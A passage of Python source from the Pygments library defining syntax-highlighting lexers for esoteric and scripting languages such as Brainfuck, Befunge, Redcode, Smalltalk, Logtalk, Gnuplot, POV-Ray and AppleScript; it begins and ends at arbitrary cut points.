""" name = 'Brainfuck' aliases = ['brainfuck', 'bf'] filenames = ['*.bf', '*.b'] mimetypes = ['application/x-brainfuck'] tokens = { 'common': [ # use different colors for different instruction types (r'[.,]+', Name.Tag), (r'[+-]+', Name.Builtin), (r'[<>]+', Name.Variable), (r'[^.,+\-<>\[\]]+', Comment), ], 'root': [ (r'\[', Keyword, 'loop'), (r'\]', Error), include('common'), ], 'loop': [ (r'\[', Keyword, '#push'), (r'\]', Keyword, '#pop'), include('common'), ] } class BefungeLexer(RegexLexer): """ Lexer for the esoteric `Befunge <http://en.wikipedia.org/wiki/Befunge>`_ language. *New in Pygments 0.7.* """ name = 'Befunge' aliases = ['befunge'] filenames = ['*.befunge'] mimetypes = ['application/x-befunge'] tokens = { 'root': [ (r'[0-9a-f]', Number), (r'[\+\*/%!`-]', Operator), # Traditional math (r'[<>^v?\[\]rxjk]', Name.Variable), # Move, imperatives (r'[:\\$.,n]', Name.Builtin), # Stack ops, imperatives (r'[|_mw]', Keyword), (r'[{}]', Name.Tag), # Befunge-98 stack ops (r'".*?"', String.Double), # Strings don't appear to allow escapes (r'\'.', String.Single), # Single character (r'[#;]', Comment), # Trampoline... depends on direction hit (r'[pg&~=@iotsy]', Keyword), # Misc (r'[()A-Z]', Comment), # Fingerprints (r'\s+', Text), # Whitespace doesn't matter ], } class RedcodeLexer(RegexLexer): """ A simple Redcode lexer based on ICWS'94. Contributed by Adam Blinkinsop <blinks@acm.org>. 
*New in Pygments 0.8.* """ name = 'Redcode' aliases = ['redcode'] filenames = ['*.cw'] opcodes = ['DAT','MOV','ADD','SUB','MUL','DIV','MOD', 'JMP','JMZ','JMN','DJN','CMP','SLT','SPL', 'ORG','EQU','END'] modifiers = ['A','B','AB','BA','F','X','I'] tokens = { 'root': [ # Whitespace: (r'\s+', Text), (r';.*$', Comment.Single), # Lexemes: # Identifiers (r'\b(%s)\b' % '|'.join(opcodes), Name.Function), (r'\b(%s)\b' % '|'.join(modifiers), Name.Decorator), (r'[A-Za-z_][A-Za-z_0-9]+', Name), # Operators (r'[-+*/%]', Operator), (r'[#$@<>]', Operator), # mode (r'[.,]', Punctuation), # mode # Numbers (r'[-+]?\d+', Number.Integer), ], } class MOOCodeLexer(RegexLexer): """ For `MOOCode <http://www.moo.mud.org/>`_ (the MOO scripting language). *New in Pygments 0.9.* """ name = 'MOOCode' filenames = ['*.moo'] aliases = ['moocode', 'moo'] mimetypes = ['text/x-moocode'] tokens = { 'root' : [ # Numbers (r'(0|[1-9][0-9_]*)', Number.Integer), # Strings (r'"(\\\\|\\"|[^"])*"', String), # exceptions (r'(E_PERM|E_DIV)', Name.Exception), # db-refs (r'((#[-0-9]+)|(\$[a-z_A-Z0-9]+))', Name.Entity), # Keywords (r'\b(if|else|elseif|endif|for|endfor|fork|endfork|while' r'|endwhile|break|continue|return|try' r'|except|endtry|finally|in)\b', Keyword), # builtins (r'(random|length)', Name.Builtin), # special variables (r'(player|caller|this|args)', Name.Variable.Instance), # skip whitespace (r'\s+', Text), (r'\n', Text), # other operators (r'([!;=,{}&\|:\.\[\]@\(\)\<\>\?]+)', Operator), # function call (r'([a-z_A-Z0-9]+)(\()', bygroups(Name.Function, Operator)), # variables (r'([a-zA-Z_0-9]+)', Text), ] } class SmalltalkLexer(RegexLexer): """ For `Smalltalk <http://www.smalltalk.org/>`_ syntax. Contributed by Stefan Matthias Aust. Rewritten by Nils Winter. 
*New in Pygments 0.10.* """ name = 'Smalltalk' filenames = ['*.st'] aliases = ['smalltalk', 'squeak', 'st'] mimetypes = ['text/x-smalltalk'] tokens = { 'root' : [ (r'(<)(\w+:)(.*?)(>)', bygroups(Text, Keyword, Text, Text)), include('squeak fileout'), include('whitespaces'), include('method definition'), (r'(\|)([\w\s]*)(\|)', bygroups(Operator, Name.Variable, Operator)), include('objects'), (r'\^|\:=|\_', Operator), # temporaries (r'[\]({}.;!]', Text), ], 'method definition' : [ # Not perfect can't allow whitespaces at the beginning and the # without breaking everything (r'([a-zA-Z]+\w*:)(\s*)(\w+)', bygroups(Name.Function, Text, Name.Variable)), (r'^(\b[a-zA-Z]+\w*\b)(\s*)$', bygroups(Name.Function, Text)), (r'^([-+*/\\~<>=|&!?,@%]+)(\s*)(\w+)(\s*)$', bygroups(Name.Function, Text, Name.Variable, Text)), ], 'blockvariables' : [ include('whitespaces'), (r'(:)(\s*)(\w+)', bygroups(Operator, Text, Name.Variable)), (r'\|', Operator, '#pop'), (r'', Text, '#pop'), # else pop ], 'literals' : [ (r"'(''|[^'])*'", String, 'afterobject'), (r'\$.', String.Char, 'afterobject'), (r'#\(', String.Symbol, 'parenth'), (r'\)', Text, 'afterobject'), (r'(\d+r)?-?\d+(\.\d+)?(e-?\d+)?', Number, 'afterobject'), ], '_parenth_helper' : [ include('whitespaces'), (r'(\d+r)?-?\d+(\.\d+)?(e-?\d+)?', Number), (r'[-+*/\\~<>=|&#!?,@%\w:]+', String.Symbol), # literals (r"'(''|[^'])*'", String), (r'\$.', String.Char), (r'#*\(', String.Symbol, 'inner_parenth'), ], 'parenth' : [ # This state is a bit tricky since # we can't just pop this state (r'\)', String.Symbol, ('root', 'afterobject')), include('_parenth_helper'), ], 'inner_parenth': [ (r'\)', String.Symbol, '#pop'), include('_parenth_helper'), ], 'whitespaces' : [ # skip whitespace and comments (r'\s+', Text), (r'"(""|[^"])*"', Comment), ], 'objects' : [ (r'\[', Text, 'blockvariables'), (r'\]', Text, 'afterobject'), (r'\b(self|super|true|false|nil|thisContext)\b', Name.Builtin.Pseudo, 'afterobject'), (r'\b[A-Z]\w*(?!:)\b', Name.Class, 
'afterobject'), (r'\b[a-z]\w*(?!:)\b', Name.Variable, 'afterobject'), (r'#("(""|[^"])*"|[-+*/\\~<>=|&!?,@%]+|[\w:]+)', String.Symbol, 'afterobject'), include('literals'), ], 'afterobject' : [ (r'! !$', Keyword , '#pop'), # squeak chunk delimiter include('whitespaces'), (r'\b(ifTrue:|ifFalse:|whileTrue:|whileFalse:|timesRepeat:)', Name.Builtin, '#pop'), (r'\b(new\b(?!:))', Name.Builtin), (r'\:=|\_', Operator, '#pop'), (r'\b[a-zA-Z]+\w*:', Name.Function, '#pop'), (r'\b[a-zA-Z]+\w*', Name.Function), (r'\w+:?|[-+*/\\~<>=|&!?,@%]+', Name.Function, '#pop'), (r'\.', Punctuation, '#pop'), (r';', Punctuation), (r'[\])}]', Text), (r'[\[({]', Text, '#pop'), ], 'squeak fileout' : [ # Squeak fileout format (optional) (r'^"(""|[^"])*"!', Keyword), (r"^'(''|[^'])*'!", Keyword), (r'^(!)(\w+)( commentStamp: )(.*?)( prior: .*?!\n)(.*?)(!)', bygroups(Keyword, Name.Class, Keyword, String, Keyword, Text, Keyword)), (r"^(!)(\w+(?: class)?)( methodsFor: )('(?:''|[^'])*')(.*?!)", bygroups(Keyword, Name.Class, Keyword, String, Keyword)), (r'^(\w+)( subclass: )(#\w+)' r'(\s+instanceVariableNames: )(.*?)' r'(\s+classVariableNames: )(.*?)' r'(\s+poolDictionaries: )(.*?)' r'(\s+category: )(.*?)(!)', bygroups(Name.Class, Keyword, String.Symbol, Keyword, String, Keyword, String, Keyword, String, Keyword, String, Keyword)), (r'^(\w+(?: class)?)(\s+instanceVariableNames: )(.*?)(!)', bygroups(Name.Class, Keyword, String, Keyword)), (r'(!\n)(\].*)(! !)$', bygroups(Keyword, Text, Keyword)), (r'! !$', Keyword), ], } class LogtalkLexer(RegexLexer): """ For `Logtalk <http://logtalk.org/>`_ source code. 
*New in Pygments 0.10.* """ name = 'Logtalk' aliases = ['logtalk'] filenames = ['*.lgt'] mimetypes = ['text/x-logtalk'] tokens = { 'root': [ # Directives (r'^\s*:-\s',Punctuation,'directive'), # Comments (r'%.*?\n', Comment), (r'/\*(.|\n)*?\*/',Comment), # Whitespace (r'\n', Text), (r'\s+', Text), # Numbers (r"0'.", Number), (r'0b[01]+', Number), (r'0o[0-7]+', Number), (r'0x[0-9a-fA-F]+', Number), (r'\d+\.?\d*((e|E)(\+|-)?\d+)?', Number), # Variables (r'([A-Z_][a-zA-Z0-9_]*)', Name.Variable), # Event handlers (r'(after|before)(?=[(])', Keyword), # Execution-context methods (r'(parameter|this|se(lf|nder))(?=[(])', Keyword), # Reflection (r'(current_predicate|predicate_property)(?=[(])', Keyword), # DCGs and term expansion (r'(expand_(goal|term)|(goal|term)_expansion|phrase)(?=[(])', Keyword), # Entity (r'(abolish|c(reate|urrent))_(object|protocol|category)(?=[(])', Keyword), (r'(object|protocol|category)_property(?=[(])', Keyword), # Entity relations (r'co(mplements_object|nforms_to_protocol)(?=[(])', Keyword), (r'extends_(object|protocol|category)(?=[(])', Keyword), (r'imp(lements_protocol|orts_category)(?=[(])', Keyword), (r'(instantiat|specializ)es_class(?=[(])', Keyword), # Events (r'(current_event|(abolish|define)_events)(?=[(])', Keyword), # Flags (r'(current|set)_logtalk_flag(?=[(])', Keyword), # Compiling, loading, and library paths (r'logtalk_(compile|l(ibrary_path|oad_context|oad))(?=[(])', Keyword), # Database (r'(clause|retract(all)?)(?=[(])', Keyword), (r'a(bolish|ssert(a|z))(?=[(])', Keyword), # Control constructs (r'(ca(ll|tch)|throw)(?=[(])', Keyword), (r'(fail|true)\b', Keyword), # All solutions (r'((bag|set)of|f(ind|or)all)(?=[(])', Keyword), # Multi-threading meta-predicates (r'threaded(_(call|once|ignore|exit|peek|wait|notify))?(?=[(])', Keyword), # Term unification (r'unify_with_occurs_check(?=[(])', Keyword), # Term creation and decomposition (r'(functor|arg|copy_term|numbervars)(?=[(])', Keyword), # Evaluable functors 
(r'(rem|mod|abs|sign)(?=[(])', Keyword), (r'float(_(integer|fractional)_part)?(?=[(])', Keyword), (r'(floor|truncate|round|ceiling)(?=[(])', Keyword), # Other arithmetic functors (r'(cos|atan|exp|log|s(in|qrt))(?=[(])', Keyword), # Term testing (r'(var|atom(ic)?|integer|float|c(allable|ompound)|n(onvar|umber)|' r'ground)(?=[(])', Keyword), # Term comparison (r'compare(?=[(])', Keyword), # Stream selection and control (r'(curren|se)t_(in|out)put(?=[(])', Keyword), (r'(open|close)(?=[(])', Keyword), (r'flush_output(?=[(])', Keyword), (r'(at_end_of_stream|flush_output)\b', Keyword), (r'(stream_property|at_end_of_stream|set_stream_position)(?=[(])', Keyword), # Character and byte input/output (r'(nl|(get|peek|put)_(byte|c(har|ode)))(?=[(])', Keyword), (r'\bnl\b', Keyword), # Term input/output (r'read(_term)?(?=[(])', Keyword), (r'write(q|_(canonical|term))?(?=[(])', Keyword), (r'(current_)?op(?=[(])', Keyword), (r'(current_)?char_conversion(?=[(])', Keyword), # Atomic term processing (r'atom_(length|c(hars|o(ncat|des)))(?=[(])', Keyword), (r'(char_code|sub_atom)(?=[(])', Keyword), (r'number_c(har|ode)s(?=[(])', Keyword), # Implementation defined hooks functions (r'(se|curren)t_prolog_flag(?=[(])', Keyword), (r'\bhalt\b', Keyword), (r'halt(?=[(])', Keyword), # Message sending operators (r'(::|:|\^\^)', Operator), # External call (r'[{}]', Keyword), # Logic and control (r'\b(ignore|once)(?=[(])', Keyword), (r'\brepeat\b', Keyword), # Sorting (r'(key)?sort(?=[(])', Keyword), # Bitwise functors (r'(>>|<<|/\\|\\\\|\\)', Operator), # Arithemtic evaluation (r'\bis\b', Keyword), # Arithemtic comparison (r'(=:=|=\\=|<|=<|>=|>)', Operator), # Term creation and decomposition (r'=\.\.', Operator), # Term unification (r'(=|\\=)', Operator), # Term comparison (r'(==|\\==|@=<|@<|@>=|@>)', Operator), # Evaluable functors (r'(//|[-+*/])', Operator), (r'\b(e|pi|mod|rem)\b', Operator), # Other arithemtic functors (r'\b\*\*\b', Operator), # DCG rules (r'-->', Operator), # Control 
constructs (r'([!;]|->)', Operator), # Logic and control (r'\\+', Operator), # Mode operators (r'[?@]', Operator), # Existential quantifier (r'\^', Operator), # Strings (r'"(\\\\|\\"|[^"])*"', String), # Ponctuation (r'[()\[\],.|]', Text), # Atoms (r"[a-z][a-zA-Z0-9_]*", Text), (r"'", String, 'quoted_atom'), ], 'quoted_atom': [ (r"''", String), (r"'", String, '#pop'), (r'\\([\\abfnrtv"\']|(x[a-fA-F0-9]+|[0-7]+)\\)', String.Escape), (r"[^\\'\n]+", String), (r'\\', String), ], 'directive': [ # Conditional compilation directives (r'(el)?if(?=[(])', Keyword, 'root'), (r'(e(lse|ndif))[.]', Keyword, 'root'), # Entity directives (r'(category|object|protocol)(?=[(])', Keyword, 'entityrelations'), (r'(end_(category|object|protocol))[.]',Keyword, 'root'), # Predicate scope directives (r'(public|protected|private)(?=[(])', Keyword, 'root'), # Other directives (r'e(n(coding|sure_loaded)|xport)(?=[(])', Keyword, 'root'), (r'in(fo|itialization)(?=[(])', Keyword, 'root'), (r'(dynamic|synchronized|threaded)[.]', Keyword, 'root'), (r'(alias|d(ynamic|iscontiguous)|m(eta_predicate|ode|ultifile)|' r's(et_(logtalk|prolog)_flag|ynchronized))(?=[(])', Keyword, 'root'), (r'op(?=[(])', Keyword, 'root'), (r'(c(alls|oinductive)|reexport|use(s|_module))(?=[(])', Keyword, 'root'), (r'[a-z][a-zA-Z0-9_]*(?=[(])', Text, 'root'), (r'[a-z][a-zA-Z0-9_]*[.]', Text, 'root'), ], 'entityrelations': [ (r'(complements|extends|i(nstantiates|mp(lements|orts))|specializes)' r'(?=[(])', Keyword), # Numbers (r"0'.", Number), (r'0b[01]+', Number), (r'0o[0-7]+', Number), (r'0x[0-9a-fA-F]+', Number), (r'\d+\.?\d*((e|E)(\+|-)?\d+)?', Number), # Variables (r'([A-Z_][a-zA-Z0-9_]*)', Name.Variable), # Atoms (r"[a-z][a-zA-Z0-9_]*", Text), (r"'", String, 'quoted_atom'), # Strings (r'"(\\\\|\\"|[^"])*"', String), # End of entity-opening directive (r'([)]\.)', Text, 'root'), # Scope operator (r'(::)', Operator), # Ponctuation (r'[()\[\],.|]', Text), # Comments (r'%.*?\n', Comment), (r'/\*(.|\n)*?\*/',Comment), # 
Whitespace (r'\n', Text), (r'\s+', Text), ] } def analyse_text(text): if ':- object(' in text: return True if ':- protocol(' in text: return True if ':- category(' in text: return True return False def _shortened(word): dpos = word.find('$') return '|'.join([word[:dpos] + word[dpos+1:i] + r'\b' for i in range(len(word), dpos, -1)]) def _shortened_many(*words): return '|'.join(map(_shortened, words)) class GnuplotLexer(RegexLexer): """ For `Gnuplot <http://gnuplot.info/>`_ plotting scripts. *New in Pygments 0.11.* """ name = 'Gnuplot' aliases = ['gnuplot'] filenames = ['*.plot', '*.plt'] mimetypes = ['text/x-gnuplot'] tokens = { 'root': [ include('whitespace'), (_shortened('bi$nd'), Keyword, 'bind'), (_shortened_many('ex$it', 'q$uit'), Keyword, 'quit'), (_shortened('f$it'), Keyword, 'fit'), (r'(if)(\s*)(\()', bygroups(Keyword, Text, Punctuation), 'if'), (r'else\b', Keyword), (_shortened('pa$use'), Keyword, 'pause'), (_shortened_many('p$lot', 'rep$lot', 'sp$lot'), Keyword, 'plot'), (_shortened('sa$ve'), Keyword, 'save'), (_shortened('se$t'), Keyword, ('genericargs', 'optionarg')), (_shortened_many('sh$ow', 'uns$et'), Keyword, ('noargs', 'optionarg')), (_shortened_many('low$er', 'ra$ise', 'ca$ll', 'cd$', 'cl$ear', 'h$elp', '\\?$', 'hi$story', 'l$oad', 'pr$int', 'pwd$', 're$read', 'res$et', 'scr$eendump', 'she$ll', 'sy$stem', 'up$date'), Keyword, 'genericargs'), (_shortened_many('pwd$', 're$read', 'res$et', 'scr$eendump', 'she$ll', 'test$'), Keyword, 'noargs'), ('([a-zA-Z_][a-zA-Z0-9_]*)(\s*)(=)', bygroups(Name.Variable, Text, Operator), 'genericargs'), ('([a-zA-Z_][a-zA-Z0-9_]*)(\s*\(.*?\)\s*)(=)', bygroups(Name.Function, Text, Operator), 'genericargs'), (r'@[a-zA-Z_][a-zA-Z0-9_]*', Name.Constant), # macros (r';', Keyword), ], 'comment': [ (r'[^\\\n]', Comment), (r'\\\n', Comment), (r'\\', Comment), # don't add the newline to the Comment token ('', Comment, '#pop'), ], 'whitespace': [ ('#', Comment, 'comment'), (r'[ \t\v\f]+', Text), ], 'noargs': [ 
include('whitespace'), # semicolon and newline end the argument list (r';', Punctuation, '#pop'), (r'\n', Text, '#pop'), ], 'dqstring': [ (r'"', String, '#pop'), (r'\\([\\abfnrtv"\']|x[a-fA-F0-9]{2,4}|[0-7]{1,3})', String.Escape), (r'[^\\"\n]+', String), # all other characters (r'\\\n', String), # line continuation (r'\\', String), # stray backslash (r'\n', String, '#pop'), # newline ends the string too ], 'sqstring': [ (r"''", String), # escaped single quote (r"'", String, '#pop'), (r"[^\\'\n]+", String), # all other characters (r'\\\n', String), # line continuation (r'\\', String), # normal backslash (r'\n', String, '#pop'), # newline ends the string too ], 'genericargs': [ include('noargs'), (r'"', String, 'dqstring'), (r"'", String, 'sqstring'), (r'(\d+\.\d*|\.\d+|\d+)[eE][+-]?\d+', Number.Float), (r'(\d+\.\d*|\.\d+)', Number.Float), (r'-?\d+', Number.Integer), ('[,.~!%^&*+=|?:<>/-]', Operator), ('[{}()\[\]]', Punctuation), (r'(eq|ne)\b', Operator.Word), (r'([a-zA-Z_][a-zA-Z0-9_]*)(\s*)(\()', bygroups(Name.Function, Text, Punctuation)), (r'[a-zA-Z_][a-zA-Z0-9_]*', Name), (r'@[a-zA-Z_][a-zA-Z0-9_]*', Name.Constant), # macros (r'\\\n', Text), ], 'optionarg': [ include('whitespace'), (_shortened_many( "a$ll","an$gles","ar$row","au$toscale","b$ars","bor$der", "box$width","cl$abel","c$lip","cn$trparam","co$ntour","da$ta", "data$file","dg$rid3d","du$mmy","enc$oding","dec$imalsign", "fit$","font$path","fo$rmat","fu$nction","fu$nctions","g$rid", "hid$den3d","his$torysize","is$osamples","k$ey","keyt$itle", "la$bel","li$nestyle","ls$","loa$dpath","loc$ale","log$scale", "mac$ros","map$ping","map$ping3d","mar$gin","lmar$gin", "rmar$gin","tmar$gin","bmar$gin","mo$use","multi$plot", "mxt$ics","nomxt$ics","mx2t$ics","nomx2t$ics","myt$ics", "nomyt$ics","my2t$ics","nomy2t$ics","mzt$ics","nomzt$ics", "mcbt$ics","nomcbt$ics","of$fsets","or$igin","o$utput", "pa$rametric","pm$3d","pal$ette","colorb$ox","p$lot", "poi$ntsize","pol$ar","pr$int","obj$ect","sa$mples","si$ze", 
"st$yle","su$rface","table$","t$erminal","termo$ptions","ti$cs", "ticsc$ale","ticsl$evel","timef$mt","tim$estamp","tit$le", "v$ariables","ve$rsion","vi$ew","xyp$lane","xda$ta","x2da$ta", "yda$ta","y2da$ta","zda$ta","cbda$ta","xl$abel","x2l$abel", "yl$abel","y2l$abel","zl$abel","cbl$abel","xti$cs","noxti$cs", "x2ti$cs","nox2ti$cs","yti$cs","noyti$cs","y2ti$cs","noy2ti$cs", "zti$cs","nozti$cs","cbti$cs","nocbti$cs","xdti$cs","noxdti$cs", "x2dti$cs","nox2dti$cs","ydti$cs","noydti$cs","y2dti$cs", "noy2dti$cs","zdti$cs","nozdti$cs","cbdti$cs","nocbdti$cs", "xmti$cs","noxmti$cs","x2mti$cs","nox2mti$cs","ymti$cs", "noymti$cs","y2mti$cs","noy2mti$cs","zmti$cs","nozmti$cs", "cbmti$cs","nocbmti$cs","xr$ange","x2r$ange","yr$ange", "y2r$ange","zr$ange","cbr$ange","rr$ange","tr$ange","ur$ange", "vr$ange","xzeroa$xis","x2zeroa$xis","yzeroa$xis","y2zeroa$xis", "zzeroa$xis","zeroa$xis","z$ero"), Name.Builtin, '#pop'), ], 'bind': [ ('!', Keyword, '#pop'), (_shortened('all$windows'), Name.Builtin), include('genericargs'), ], 'quit': [ (r'gnuplot\b', Keyword), include('noargs'), ], 'fit': [ (r'via\b', Name.Builtin), include('plot'), ], 'if': [ (r'\)', Punctuation, '#pop'), include('genericargs'), ], 'pause': [ (r'(mouse|any|button1|button2|button3)\b', Name.Builtin), (_shortened('key$press'), Name.Builtin), include('genericargs'), ], 'plot': [ (_shortened_many('ax$es', 'axi$s', 'bin$ary', 'ev$ery', 'i$ndex', 'mat$rix', 's$mooth', 'thru$', 't$itle', 'not$itle', 'u$sing', 'w$ith'), Name.Builtin), include('genericargs'), ], 'save': [ (_shortened_many('f$unctions', 's$et', 't$erminal', 'v$ariables'), Name.Builtin), include('genericargs'), ], } class PovrayLexer(RegexLexer): """ For `Persistence of Vision Raytracer <http://www.povray.org/>`_ files. 
*New in Pygments 0.11.* """ name = 'POVRay' aliases = ['pov'] filenames = ['*.pov', '*.inc'] mimetypes = ['text/x-povray'] tokens = { 'root': [ (r'/\*[\w\W]*?\*/', Comment.Multiline), (r'//.*\n', Comment.Single), (r'(?s)"(?:\\.|[^"\\])+"', String.Double), (r'#(debug|default|else|end|error|fclose|fopen|ifdef|ifndef|' r'include|range|read|render|statistics|switch|undef|version|' r'warning|while|write|define|macro|local|declare)\b', Comment.Preproc), (r'\b(aa_level|aa_threshold|abs|acos|acosh|adaptive|adc_bailout|' r'agate|agate_turb|all|alpha|ambient|ambient_light|angle|' r'aperture|arc_angle|area_light|asc|asin|asinh|assumed_gamma|' r'atan|atan2|atanh|atmosphere|atmospheric_attenuation|' r'attenuating|average|background|black_hole|blue|blur_samples|' r'bounded_by|box_mapping|bozo|break|brick|brick_size|' r'brightness|brilliance|bumps|bumpy1|bumpy2|bumpy3|bump_map|' r'bump_size|case|caustics|ceil|checker|chr|clipped_by|clock|' r'color|color_map|colour|colour_map|component|composite|concat|' r'confidence|conic_sweep|constant|control0|control1|cos|cosh|' r'count|crackle|crand|cube|cubic_spline|cylindrical_mapping|' r'debug|declare|default|degrees|dents|diffuse|direction|' r'distance|distance_maximum|div|dust|dust_type|eccentricity|' r'else|emitting|end|error|error_bound|exp|exponent|' r'fade_distance|fade_power|falloff|falloff_angle|false|' r'file_exists|filter|finish|fisheye|flatness|flip|floor|' r'focal_point|fog|fog_alt|fog_offset|fog_type|frequency|gif|' r'global_settings|glowing|gradient|granite|gray_threshold|' r'green|halo|hexagon|hf_gray_16|hierarchy|hollow|hypercomplex|' r'if|ifdef|iff|image_map|incidence|include|int|interpolate|' r'inverse|ior|irid|irid_wavelength|jitter|lambda|leopard|' r'linear|linear_spline|linear_sweep|location|log|looks_like|' r'look_at|low_error_factor|mandel|map_type|marble|material_map|' r'matrix|max|max_intersections|max_iteration|max_trace_level|' r'max_value|metallic|min|minimum_reuse|mod|mortar|' 
r'nearest_count|no|normal|normal_map|no_shadow|number_of_waves|' r'octaves|off|offset|omega|omnimax|on|once|onion|open|' r'orthographic|panoramic|pattern1|pattern2|pattern3|' r'perspective|pgm|phase|phong|phong_size|pi|pigment|' r'pigment_map|planar_mapping|png|point_at|pot|pow|ppm|' r'precision|pwr|quadratic_spline|quaternion|quick_color|' r'quick_colour|quilted|radial|radians|radiosity|radius|rainbow|' r'ramp_wave|rand|range|reciprocal|recursion_limit|red|' r'reflection|refraction|render|repeat|rgb|rgbf|rgbft|rgbt|' r'right|ripples|rotate|roughness|samples|scale|scallop_wave|' r'scattering|seed|shadowless|sin|sine_wave|sinh|sky|sky_sphere|' r'slice|slope_map|smooth|specular|spherical_mapping|spiral|' r'spiral1|spiral2|spotlight|spotted|sqr|sqrt|statistics|str|' r'strcmp|strength|strlen|strlwr|strupr|sturm|substr|switch|sys|' r't|tan|tanh|test_camera_1|test_camera_2|test_camera_3|' r'test_camera_4|texture|texture_map|tga|thickness|threshold|' r'tightness|tile2|tiles|track|transform|translate|transmit|' r'triangle_wave|true|ttf|turbulence|turb_depth|type|' r'ultra_wide_angle|up|use_color|use_colour|use_index|u_steps|' r'val|variance|vaxis_rotate|vcross|vdot|version|vlength|' r'vnormalize|volume_object|volume_rendered|vol_with_light|' r'vrotate|v_steps|warning|warp|water_level|waves|while|width|' r'wood|wrinkles|yes)\b', Keyword), (r'(bicubic_patch|blob|box|camera|cone|cubic|cylinder|difference|' r'disc|height_field|intersection|julia_fractal|lathe|' r'light_source|merge|mesh|object|plane|poly|polygon|prism|' r'quadric|quartic|smooth_triangle|sor|sphere|superellipsoid|' r'text|torus|triangle|union)\b', Name.Builtin), # TODO: <=, etc (r'[\[\](){}<>;,]', Punctuation), (r'[-+*/=]', Operator), (r'\b(x|y|z|u|v)\b', Name.Builtin.Pseudo), (r'[a-zA-Z_][a-zA-Z_0-9]*', Name), (r'[0-9]+\.[0-9]*', Number.Float), (r'\.[0-9]+', Number.Float), (r'[0-9]+', Number.Integer), (r'\s+', Text), ] } class AppleScriptLexer(RegexLexer): """ For `AppleScript source code 
<http://developer.apple.com/documentation/AppleScript/ Conceptual/AppleScriptLangGuide>`_, including `AppleScript Studio <http://developer.apple.com/documentation/AppleScript/ Reference/StudioReference>`_. Contributed by Andreas Amann <aamann@mac.com>. """ name = 'AppleScript' aliases = ['applescript'] filenames = ['*.applescript'] flags = re.MULTILINE | re.DOTALL Identifiers = r'[a-zA-Z]\w*' Literals = ['AppleScript', 'current application', 'false', 'linefeed', 'missing value', 'pi','quote', 'result', 'return', 'space', 'tab', 'text item delimiters', 'true', 'version'] Classes = ['alias ', 'application ', 'boolean ', 'class ', 'constant ', 'date ', 'file ', 'integer ', 'list ', 'number ', 'POSIX file ', 'real ', 'record ', 'reference ', 'RGB color ', 'script ', 'text ', 'unit types', '(?:Unicode )?text', 'string'] BuiltIn = ['attachment', 'attribute run', 'character', 'day', 'month', 'paragraph', 'word', 'year'] HandlerParams = ['about', 'above', 'against', 'apart from', 'around', 'aside from', 'at', 'below', 'beneath', 'beside', 'between', 'for', 'given', 'instead of', 'on', 'onto', 'out of', 'over', 'since'] Commands = ['ASCII (character|number)', 'activate', 'beep', 'choose URL', 'choose application', 'choose color', 'choose file( name)?', 'choose folder', 'choose from list', 'choose remote application', 'clipboard info', 'close( access)?', 'copy', 'count', 'current date', 'delay', 'delete', 'display (alert|dialog)', 'do shell script', 'duplicate', 'exists', 'get eof', 'get volume settings', 'info for', 'launch', 'list (disks|folder)', 'load script', 'log', 'make', 'mount volume', 'new', 'offset', 'open( (for access|location))?', 'path to', 'print', 'quit', 'random number', 'read', 'round', 'run( script)?', 'say', 'scripting components', 'set (eof|the clipboard to|volume)', 'store script', 'summarize', 'system attribute', 'system info', 'the clipboard', 'time to GMT', 'write', 'quoted form'] References = ['(in )?back of', '(in )?front of', 
'[0-9]+(st|nd|rd|th)', 'first', 'second', 'third', 'fourth', 'fifth', 'sixth', 'seventh', 'eighth', 'ninth', 'tenth', 'after', 'back', 'before', 'behind', 'every', 'front', 'index', 'last', 'middle', 'some', 'that', 'through', 'thru', 'where', 'whose'] Operators = ["and", "or", "is equal", "equals", "(is )?equal to", "is not", "isn't", "isn't equal( to)?", "is not equal( to)?", "doesn't equal", "does not equal", "(is )?greater than", "comes after", "is not less than or equal( to)?", "isn't less than or equal( to)?", "(is )?less than", "comes before", "is not greater than or equal( to)?", "isn't greater than or equal( to)?", "(is )?greater than or equal( to)?", "is not less than", "isn't less than", "does not come before", "doesn't come before", "(is )?less than or equal( to)?", "is not greater than", "isn't greater than", "does not come after", "doesn't come after", "starts? with", "begins? with", "ends? with", "contains?", "does not contain", "doesn't contain", "is in", "is contained by", "is not in", "is not contained by", "isn't contained by", "div", "mod", "not", "(a )?(ref( to)?|reference to)", "is", "does"] Control = ['considering', 'else', 'error', 'exit', 'from', 'if', 'ignoring', 'in', 'repeat', 'tell', 'then', 'times', 'to', 'try', 'until', 'using terms from', 'while', 'whith', 'with timeout( of)?', 'with transaction', 'by', 'continue', 'end', 'its?', 'me', 'my', 'return', 'of' , 'as'] Declarations = ['global', 'local', 'prop(erty)?', 'set', 'get'] Reserved = ['but', 'put', 'returning', 'the'] StudioClasses = ['action cell', 'alert reply', 'application', 'box', 'browser( cell)?', 'bundle', 'button( cell)?', 'cell', 'clip view', 'color well', 'color-panel', 'combo box( item)?', 'control', 'data( (cell|column|item|row|source))?', 'default entry', 'dialog reply', 'document', 'drag info', 'drawer', 'event', 'font(-panel)?', 'formatter', 'image( (cell|view))?', 'matrix', 'menu( item)?', 'item', 'movie( view)?', 'open-panel', 'outline view', 'panel', 
'pasteboard', 'plugin', 'popup button', 'progress indicator', 'responder', 'save-panel', 'scroll view', 'secure text field( cell)?', 'slider', 'sound', 'split view', 'stepper', 'tab view( item)?', 'table( (column|header cell|header view|view))', 'text( (field( cell)?|view))?', 'toolbar( item)?', 'user-defaults', 'view', 'window'] StudioEvents = ['accept outline drop', 'accept table drop', 'action', 'activated', 'alert ended', 'awake from nib', 'became key', 'became main', 'begin editing', 'bounds changed', 'cell value', 'cell value changed', 'change cell value', 'change item value', 'changed', 'child of item', 'choose menu item', 'clicked', 'clicked toolbar item', 'closed', 'column clicked', 'column moved', 'column resized', 'conclude drop', 'data representation', 'deminiaturized', 'dialog ended', 'document nib name', 'double clicked', 'drag( (entered|exited|updated))?', 'drop', 'end editing', 'exposed', 'idle', 'item expandable', 'item value', 'item value changed', 'items changed', 'keyboard down', 'keyboard up', 'launched', 'load data representation', 'miniaturized', 'mouse down', 'mouse dragged', 'mouse entered', 'mouse exited', 'mouse moved', 'mouse up', 'moved', 'number of browser rows', 'number of items', 'number of rows', 'open untitled', 'opened', 'panel ended', 'parameters updated', 'plugin loaded', 'prepare drop', 'prepare outline drag', 'prepare outline drop', 'prepare table drag', 'prepare table drop', 'read from file', 'resigned active', 'resigned key', 'resigned main', 'resized( sub views)?', 'right mouse down', 'right mouse dragged', 'right mouse up', 'rows changed', 'scroll wheel', 'selected tab view item', 'selection changed', 'selection changing', 'should begin editing', 'should close', 'should collapse item', 'should end editing', 'should expand item', 'should open( untitled)?', 'should quit( after last window closed)?', 'should select column', 'should select item', 'should select row', 'should select tab 